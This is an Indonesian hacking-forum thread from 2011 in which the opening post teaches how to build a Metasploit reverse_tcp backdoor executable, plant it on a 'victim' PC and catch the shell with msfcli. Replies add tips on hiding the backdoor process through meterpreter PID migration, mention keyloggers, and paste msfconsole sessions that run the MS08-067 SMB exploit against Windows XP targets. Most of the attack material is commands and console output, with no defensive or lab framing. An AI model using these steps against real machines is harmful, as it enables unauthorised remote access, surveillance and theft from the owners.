msfpayload windows/shell/reverse_tcp
#1
Thumbs Up 
weleh hari ini binun mau post apa.. tapi pas mampir ke mabes IBT tadi pagi jadi gatel kepingin nulis lagi ..heheheh ya udah langsung aja ya…

sesuai dengan judulnya kita akan belajar membuat salah satu backdoor reverse_tcp dengan metasploit. nah gw ( zee eichel yang ganteng ) menguji coba tutor ini langsung dari markas IBT menggunakan backtrack 5 gnome.

Langkah pertama :

1 sesuai dengan yang kita bicarain tadi .. yaitu backdoor .. tentu saja seperti biasanya kita mesti bikin backdoor nya dulu

[Image: snapshot9.png?w=497&h=53]

di liat dari script di atas kita bisa tau bahwa backdoor tercipta bernama zee-reverse-shell.exe . tentu saja bisa di ganti semau anda.. dan LHOST jgn di lupa masukin IP address ente semua Tongue … oh ya destinasi filenya ada di tmp .. liat petikannya

x > /tmp/…..

bisa di ganti juga sesuai keperluan …

2. Step berikutnya kita harus mengupload shell tersebut pada pc target… caranya …??? ya tergantung selera dan kreasi anda semua hehehehhe

3. Anggap saja kita sudah mengupload shell tadi dan sekarang kita masukan perintah – perintah di bawah ini

/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.101 E

LHOST = diisikan dengan ip address ente ..

PAYLOAD = harus sama dengan backdoor ..

4. Disaat korban merunning backdoor ente maka yang terjadi adalah

[Image: snapshot8.png?w=497&h=310]

lalalalala ente mendapat akses shell langsung .. heheheh .. backdoor ini masih bisa di variasikan dengan PAYLOAD meterpreter.. namun sekali lagi ini adalah seni… jadi use your logic ..
ane , zee eichel mohon pamit nyari jodoh ..hahahaha
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
nice share zee.... makin banyak tau ane tentang metasploit neeh

#3
backdoor yg ini terlihat running di task manager wedus gk ya om ?
[shcode=This_site_xss-ed]

#4
(08-30-2011, 09:29 AM)koecroet Wrote: backdoor yg ini terlihat running di task manager wedus gk ya om ?

kelihatan bro, tp kan bisa kita migrate ke PID lain klo pake meterpreter Smile

#5
nice info om zee...
cari jodoh jgn pake jauh yahhh om ntr camp di lupakan lagi
hehehehehehe.. Angry

#6
(08-30-2011, 03:08 PM)konspirasi Wrote:
(08-30-2011, 09:29 AM)koecroet Wrote: backdoor yg ini terlihat running di task manager wedus gk ya om ?

kelihatan bro, tp kan bisa kita migrate ke PID lain klo pake meterpreter Smile

wih mantap om Tongue
harus di coba !! Cool
[shcode=This_site_xss-ed]

#7
kaya gini gmn om nya:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

#8
(09-14-2011, 03:20 PM)ririaz Wrote: kaya gini gmn om nya:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

ini kayaknya g jalan,, perhatika but no session was created.,,, mirip yang saya coba kan kemaren",,g berhasill,,
seperti nya ke blok firewall,,
@ kak zhee,, saya coba pake meterpreter bind_tcp jga no session was created ,,gimana itu??
kalo g salah kalo session nya ada,kita bisa pasa keylogger juga


ini erronya punya saya kak zhee

=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set DCERPC::fake_bind_multi false
DCERPC::fake_bind_multi => false
msf exploit(ms08_067_netapi) > set RHOST 172.16.40.75
RHOST => 172.16.40.75
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.


#9
itu target pc di virtualisasi atau pc orang bro?

klo pc orang, trus OS windowsnya asli, patch up to date atau ada antivirus n firewallnya ya ga bisa Tongue

oiya FYI bind_tcp itu berarti arah exploit dari pc kita, sedangkan reverse exploit arahnya dari pc target

#10
RE: msfpayload windows/shell/reverse_tcp
kaya gini gmn om nya:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

ok om konsipirasi ,itu pake victim laf ane sendiri tp yg aneh om klo pake db_autopown -p -t -e -r
itu session ny dapat bahkan smpe 2 session lagi .
padahal firewall nya ane matiin tp antivirus running, itu bisa tembus om.
tapi klo manual ko engga bisa nya aduhhhhh....lier abdi mahhhh....






Users browsing this thread: 1 Guest(s)